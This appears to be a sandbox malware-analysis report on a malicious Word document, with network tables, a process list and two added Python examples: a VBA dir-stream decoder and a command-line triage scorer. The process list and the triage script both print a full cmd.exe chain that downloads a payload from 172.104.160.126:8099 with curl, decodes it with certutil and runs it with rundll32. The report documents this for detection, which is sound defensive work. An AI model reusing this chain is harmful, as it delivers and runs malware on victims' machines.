        CLSID:
        File Type:data
        Stream Size:514
        Entropy:6.2857106919283545
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . > h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . . m A ! O f f i c g O D . f . i . c g . . ! G {
        Data Raw:01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e3 3e ab 68 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
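
The report labels VBA/dir as Base64 encoded, but its raw bytes are an MS-OVBA compressed container: signature byte 0x01, then the chunk header 0xb1fe (bit 15 set means compressed; the low 12 bits 0x1fe plus 3 give a 513-byte chunk, which together with the signature byte is exactly the 514-byte stream size). The dir stream is the VBA project's table of contents: its MODULEOFFSET records say where the compressed source starts inside each module stream, which is what a VBA-stomping check decompresses and compares against the p-code. What follows is an added example, not Joe Sandbox's or the oletools project's code, that implements that decompression and walks the records over the 128-byte Data Raw excerpt printed above. Because the excerpt stops there, the walk ends partway into the first REFERENCEREGISTERED record and never reaches the module records; the record names follow MS-OVBA section 2.3.4.2.

```python
"""Decompress the VBA/dir stream (MS-OVBA 2.4.1 CompressedContainer) and walk
its records (MS-OVBA 2.3.4.2).  Added example for this report, not Joe Sandbox
or oletools code.  Input: the 128-byte Data Raw excerpt printed above; the
full stream is 514 bytes, so decoding stops where the excerpt does."""
import struct

# First 128 bytes of VBA/dir exactly as listed in the report's Data Raw field.
DIR_STREAM_EXCERPT = bytes.fromhex(
    "01feb1800100040000000300302a0202" "90090070140648030082020064e40404"
    "0007001c0050726f6a65637405510028" "00004002140602143dad020a07026c01"
    "1408061209021280e33eab6802000c02" "4a123c020a16000172737464106f6c65"
    "3e0219730074000064006f006c006550" "000d006800255e00032a005c477b3030")

def ovba_decompress(data: bytes, allow_truncated: bool = False) -> bytes:
    """Signature 0x01, then chunks: 2-byte header, then flag bytes each followed by
    8 tokens (a literal byte, or a 2-byte copy token whose offset/length split
    depends on how much of the chunk is already decompressed)."""
    if not data or data[0] != 0x01:
        raise ValueError("missing MS-OVBA signature byte 0x01")
    out, pos = bytearray(), 1
    while pos < len(data):
        if pos + 2 > len(data):
            if allow_truncated:
                break
            raise ValueError("truncated chunk header")
        header = struct.unpack_from("<H", data, pos)[0]
        chunk_end, compressed = pos + (header & 0x0FFF) + 3, bool(header & 0x8000)
        pos, chunk_start = pos + 2, len(out)        # copy offsets are chunk-relative
        limit = min(chunk_end, len(data))
        if not compressed:
            out += data[pos:limit]
        while compressed and pos < limit and len(out) - chunk_start < 4096:
            flags, pos = data[pos], pos + 1
            for bit in range(8):
                if pos >= limit or len(out) - chunk_start >= 4096:
                    break
                if not (flags >> bit) & 1:                       # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                if pos + 2 > limit:                              # copy token cut in half
                    pos = limit
                    break
                token = struct.unpack_from("<H", data, pos)[0]
                pos += 2
                diff = len(out) - chunk_start
                bit_count = max((diff - 1).bit_length(), 4)      # = max(ceil(log2 diff), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                for _ in range(length):                          # may overlap its own output
                    out.append(out[-offset])
        if chunk_end > len(data):
            if allow_truncated:
                break
            raise ValueError("chunk runs past the end of the stream")
        pos = chunk_end
    return bytes(out)

def walk_dir_records(dir_bytes: bytes):
    """(id, data, partial) triples.  Every field, Reserved/Unicode sub-fields
    included, is laid out Id(2) Size(4) Data(Size); the exception is PROJECTVERSION
    (0x0009), whose Size is fixed at 4 but carries VersionMajor(4)+VersionMinor(2)."""
    records, pos = [], 0
    while pos + 6 <= len(dir_bytes):
        rec_id, size = struct.unpack_from("<HI", dir_bytes, pos)
        pos += 6
        size = 6 if rec_id == 0x0009 else size
        partial = pos + size > len(dir_bytes)
        records.append((rec_id, dir_bytes[pos:pos + size], partial))
        if partial:
            break
        pos += size
    return records

DIR_IDS = {0x0001: "PROJECTSYSKIND", 0x0002: "PROJECTLCID", 0x0014: "PROJECTLCIDINVOKE",
           0x0003: "PROJECTCODEPAGE", 0x0004: "PROJECTNAME", 0x0005: "PROJECTDOCSTRING",
           0x0040: "PROJECTDOCSTRING.unicode", 0x0006: "PROJECTHELPFILEPATH",
           0x003D: "PROJECTHELPFILEPATH.helpfile2", 0x0007: "PROJECTHELPCONTEXT",
           0x0008: "PROJECTLIBFLAGS", 0x0009: "PROJECTVERSION", 0x000C: "PROJECTCONSTANTS",
           0x003C: "PROJECTCONSTANTS.unicode", 0x0016: "REFERENCENAME",
           0x003E: "REFERENCENAME.unicode", 0x000D: "REFERENCEREGISTERED",
           0x000F: "PROJECTMODULES", 0x0019: "MODULENAME", 0x001A: "MODULESTREAMNAME",
           0x0031: "MODULEOFFSET", 0x0021: "MODULETYPE_PROCEDURAL",
           0x0022: "MODULETYPE_DOCUMENT", 0x002B: "MODULE_END", 0x0010: "DIR_END"}

def summarize_dir(raw_stream: bytes) -> dict:
    """Project metadata plus (module name, MODULEOFFSET) pairs; MODULEOFFSET is where
    a stomping check starts decompressing source to compare it with the p-code."""
    dec = ovba_decompress(raw_stream, allow_truncated=True)
    recs = walk_dir_records(dec)
    first = {}
    for rec_id, data, _ in recs:
        first.setdefault(rec_id, data)              # project-level records come first
    u32 = lambda rid: struct.unpack("<I", first[rid])[0] if rid in first else None
    codepage = "cp%d" % struct.unpack("<H", first[0x0003])[0]
    info = {"decompressed_len": len(dec), "truncated": bool(recs) and recs[-1][2],
            "records": [(DIR_IDS.get(r, "0x%04x" % r), d) for r, d, _ in recs],
            "syskind": u32(0x0001),   # 3 = 64-bit Windows, matching the 64-bit WINWORD.EXE below
            "lcid": u32(0x0002), "lcid_invoke": u32(0x0014), "codepage": int(codepage[2:]),
            "name": first[0x0004].decode(codepage),
            "version": struct.unpack("<IH", first[0x0009]),
            "references": [d.decode(codepage) for r, d, p in recs if r == 0x0016 and not p],
            "modules": []}
    module = None
    for rec_id, data, partial in recs:
        if partial:
            break
        if rec_id == 0x0019:
            module = data.decode(codepage)
        elif rec_id == 0x0031:
            info["modules"].append((module, struct.unpack("<I", data)[0]))
    return info
```

On this excerpt the walk yields SysKind 3, LCID 0x409, code page 1252, project name "Project" and the stdole reference before running out of bytes; on the full 514-byte stream the same call also returns the module list with each MODULEOFFSET, which is the input a stomping check needs. The default `allow_truncated=False` is the right setting for a stream pulled from the real document, where a chunk that overruns the stream means the data is damaged rather than merely cut short.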
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Jul 22, 2024 15:52:01.657860994 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:01.657906055 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:01.657973051 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:01.658164978 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:01.658181906 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:02.368962049 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:02.369291067 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:02.369309902 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:02.370276928 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:02.370346069 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:02.371309996 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:02.371380091 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:02.566080093 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:02.566097975 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:02.765502930 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:10.264959097 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.264991999 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.265041113 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.265232086 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.265249014 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.954627991 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.954966068 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.954987049 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.955338955 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.955426931 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.956016064 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.956069946 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.957026005 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.957088947 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.957223892 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:10.957233906 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:10.957267046 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:11.004507065 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:11.156836987 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:11.231894016 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:11.232101917 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:11.232260942 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:11.233057022 CEST | 49171 | 443 | 192.168.2.22 | 172.217.168.14
        Jul 22, 2024 15:52:11.233095884 CEST | 443 | 49171 | 172.217.168.14 | 192.168.2.22
        Jul 22, 2024 15:52:12.268873930 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:12.268944025 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:52:12.269156933 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:13.470407009 CEST | 49170 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:52:13.470443964 CEST | 443 | 49170 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:01.925507069 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:53:01.925563097 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:01.925669909 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:53:02.019361973 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:53:02.019392967 CE퐀ST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:02.712658882 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:02.713826895 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:53:02.713850975 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:02.714171886 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:02.715807915 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:53:02.715877056 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:02.920512915 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:02.920711994 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Jul 22, 2024 15:53:12.613501072 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:12.613657951 CEST | 443 | 49174 | 142.250.203.100 | 192.168.2.22
        Jul 22, 2024 15:53:12.613740921 CEST | 49174 | 443 | 192.168.2.22 | 142.250.203.100
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Jul 22, 2024 15:51:57.115956068 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:51:57.238284111 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:51:58.478197098 CEST | 53 | 63926 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:01.649885893 CEST | 58095 | 53 | 192.168.2.22 | 8.8.8.8
        Jul 22, 2024 15:52:01.650075912 CEST | 54261 | 53 | 192.168.2.22 | 8.8.8.8
        Jul 22, 2024 15:52:01.656579018 CEST | 53 | 54261 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:01.657058001 CEST | 53 | 58095 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:10.242295027 CEST | 62453 | 53 | 192.168.2.22 | 8.8.8.8
        Jul 22, 2024 15:52:10.242433071 CEST | 50568 | 53 | 192.168.2.22 | 8.8.8.8
        Jul 22, 2024 15:52:10.256547928 CEST | 53 | 62453 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:10.284553051 CEST | 53 | 50568 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:15.490757942 CEST | 53 | 50337 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:22.489500999 CEST | 53 | 53406 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:32.836777925 CEST | 53 | 64687 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:50.519622087 CEST | 53 | 51955 | 8.8.8.8 | 192.168.2.22
        Jul 22, 2024 15:52:56.966444016 CEST | 53 | 53060 | 8.8.8.8 | 192.168.2.22
        Timestamp | Source IP | Dest IP | Checksum | Code | Type
        Jul 22, 2024 15:52:10.284624100 CEST | 192.168.2.22 | 8.8.8.8 | d050 | Port unreachable | Destination Unreachable
        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
        Jul 22, 2024 15:52:01.649885893 CEST | 192.168.2.22 | 8.8.8.8 | 0xd6a8 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
        Jul 22, 2024 15:52:01.650075912 CEST | 192.168.2.22 | 8.8.8.8 | 0xd590 | Standard query (0) | www.google.com | 65 (HTTPS) | IN (0x0001) | false
        Jul 22, 2024 15:52:10.242295027 CEST | 192.168.2.22 | 8.8.8.8 | 0x8833 | Standard query (0) | sb-ssl.google.com | A (IP address) | IN (0x0001) | false
        Jul 22, 2024 15:52:10.242433071 CEST | 192.168.2.22 | 8.8.8.8 | 0xfe39 | Standard query (0) | sb-ssl.google.com | 65 (HTTPS) | IN (0x0001) | false
        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
        Jul 22, 2024 15:52:01.656579018 CEST | 8.8.8.8 | 192.168.2.22 | 0xd590 | No error (0) | www.google.com | | | 65 (HTTPS) | IN (0x0001) | false
        Jul 22, 2024 15:52:01.657058001 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6a8 | No error (0) | www.google.com | | 142.250.203.100 | A (IP address) | IN (0x0001) | false
        Jul 22, 2024 15:52:10.256547928 CEST | 8.8.8.8 | 192.168.2.22 | 0x8833 | No error (0) | sb-ssl.google.com | sb-ssl.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
        Jul 22, 2024 15:52:10.256547928 CEST | 8.8.8.8 | 192.168.2.22 | 0x8833 | No error (0) | sb-ssl.l.google.com | | 172.217.168.14 | A (IP address) | IN (0x0001) | false
        Jul 22, 2024 15:52:10.284553051 CEST | 8.8.8.8 | 192.168.2.22 | 0xfe39 | No error (0) | sb-ssl.google.com | sb-ssl.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
        • sb-ssl.google.com


        Target ID:0
        Start time:09:51:17
        Start date:22/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f3b0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:09:51:19
        Start date:22/07/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
        Imagebase:0x4a610000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:09:51:19
        Start date:22/07/2024
        Path:C:\Windows\System32\xcopy.exe
        Wow64 process (32bit):false
        Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
        Imagebase:0xff890000
        File size:43'008 bytes
        MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:5
        Start time:09:51:20
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
        Imagebase:0xffa90000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:6
        Start time:09:51:20
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
        Imagebase:0xff300000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:7
        Start time:09:51:20
        Start date:22/07/2024
        Path:C:\Users\user\AppData\Local\Temp\curl.exe
        Wow64 process (32bit):false
        Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
        Imagebase:0x13f480000
        File size:530'944 bytes
        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 0%, ReversingLabs
        Reputation:moderate
        Has exited:true

        Target ID:8
        Start time:09:51:23
        Start date:22/07/2024
        Path:C:\Windows\System32\certutil.exe
        Wow64 process (32bit):false
        Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
        Imagebase:0xff960000
        File size:1'192'448 bytes
        MD5 hash:4586B77B18FA9A8518AF76CA8FD247D9
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:9
        Start time:09:51:23
        Start date:22/07/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
        Imagebase:0xff0a0000
        File size:45'568 bytes
        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true
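
The cmd.exe line above (Target ID 2, and again as Target ID 17) is the whole chain in eleven `&`-joined stages: copy the built-in C:\Windows\System32\curl.exe into the user's Temp directory, round-trip it through certutil -encode and -decode so that a freshly written copy sits there, fetch http://172.104.160.126:8099/payload2.txt with that copy, certutil -decode the download into mscorsvc.dll, delete the intermediates, and start rundll32 on the DLL's DllMain export. Every stage runs a Windows-shipped binary, so each child process on its own looks unremarkable and the line has to be scored as a whole. What follows is an added example, not Joe Sandbox's or any vendor's code, of that whole-line triage in Python: it splits the chain, tags each stage with the living-off-the-land technique it implements, extracts the URL, host and dropped-file indicators, and scores the result. The rule names, regexes, weights, the benign comparison line and the parent image passed in (the process list here has no parent field) are my own construction.

```python
"""Whole-chain triage of the cmd.exe command line observed above (Target ID 2,
repeated as Target ID 17).  Added example for this report, not Joe Sandbox or
vendor code: rule names, regexes, weights and the benign line are constructed."""
import json
import re
from urllib.parse import urlsplit

# The observed command line, reassembled stage by stage from the report.
OBSERVED_CMDLINE = r'"C:\Windows\System32\cmd.exe" /c ' + " & ".join([
    r"xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp",
    r"certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt",
    r"certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe",
    r"C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt",
    r"certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll",
    r"del C:\Users\user\AppData\Local\Temp\curl.exe",
    r"del C:\Users\user\AppData\Local\Temp\curl.txt",
    r"del C:\Users\user\AppData\Local\Temp\curl.exe",
    r"del C:\Users\user\AppData\Local\Temp\mscorsvc.txt",
    r'START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain',
    "exit",
])
# Constructed benign line for contrast: certutil decoding a certificate, not a PE.
BENIGN_CMDLINE = r'"C:\Windows\System32\cmd.exe" /c certutil -f -decode C:\Users\user\Downloads\ca.txt C:\Users\user\Downloads\ca.cer'

CMD_PREFIX = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
URL_RE = re.compile(r"https?://[^\s\"'&]+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"&,]+")
OFFICE_PARENT = re.compile(r"\\(?:winword|excel|powerpnt|outlook|msaccess)\.exe$", re.I)

# One rule per living-off-the-land technique in the chain; each is matched per stage.
RULES = [
    ("copy_system_binary_to_temp",
     re.compile(r"\b(?:x?copy|robocopy)\b.*\\System32\\\S+\.exe\b.*\\Temp\b", re.I)),
    ("certutil_encode", re.compile(r"\bcertutil(?:\.exe)?\b.*\s-encode\b", re.I)),
    ("certutil_decode_to_executable",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-decode\b.*\.(?:exe|dll|scr|cpl)\s*$", re.I)),
    ("curl_download_from_raw_ip",
     re.compile(r"\bcurl(?:\.exe)?\b.*\bhttps?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I)),
    ("rundll32_dll_from_user_temp",
     re.compile(r"\brundll32(?:\.exe)?\s+\S*\\AppData\\Local\\Temp\\\S+\.dll\b", re.I)),
    ("artifact_cleanup", re.compile(r"^(?:del|erase)\s", re.I)),
]

def split_stages(cmdline):
    """Strip the cmd.exe /c wrapper and split the body on the & / && separators."""
    body = CMD_PREFIX.sub("", cmdline, count=1)
    return [s.strip() for s in re.split(r"\s*&&?\s*", body) if s.strip()]

def extract_iocs(cmdline):
    """URLs, remote host:port pairs and files written under the user's Temp directory."""
    urls = list(dict.fromkeys(URL_RE.findall(cmdline)))
    paths = list(dict.fromkeys(PATH_RE.findall(cmdline)))
    return {"urls": urls,
            "remote_hosts": list(dict.fromkeys(urlsplit(u).netloc for u in urls)),
            "dropped_files": [p for p in paths if "\\AppData\\Local\\Temp\\" in p]}

def triage(cmdline, parent_image=None):
    """Tag every stage, score the chain as a whole and pull out the indicators."""
    stages = split_stages(cmdline)
    hits = {}
    for n, stage in enumerate(stages, 1):
        for name, rx in RULES:
            if rx.search(stage):
                hits.setdefault(name, []).append(n)
    score = len(hits)
    if parent_image and OFFICE_PARENT.search(parent_image):
        score += 2                      # an Office parent weighs more than any single stage
    return {"stages": stages, "hits": hits, "score": score,
            "verdict": "suspicious" if score >= 3 else "no findings",
            "iocs": extract_iocs(cmdline)}

if __name__ == "__main__":
    # Parent assumed to be the report's WINWORD.EXE (Target ID 0); the list above has no parent field.
    print(json.dumps(triage(OBSERVED_CMDLINE, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"), indent=2))
```

Run on the observed line, all six rules fire (the decode rule twice, on stages 3 and 5; cleanup four times) and the indicators come out as the one URL, the host 172.104.160.126:8099 and the four files under Temp; the benign certutil line produces no hits. Note that the TLS flows in the packet tables above go to 142.250.203.100 and 172.217.168.14, which the DNS answers map to www.google.com and sb-ssl.google.com, that is, Chrome's own traffic; the plain-HTTP fetch from 172.104.160.126:8099 is not among the packets listed in this excerpt, so the network indicator comes from the command line rather than from those rows.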

        Target ID:10
        Start time:09:51:54
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Target ID:11
        Start time:09:51:55
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Target ID:14
        Start time:09:51:58
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
        Imagebase:0x13f6d0000
        File size:3'151'128 bytes
        MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:15
        Start time:09:52:02
        Start date:22/07/2024
        Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
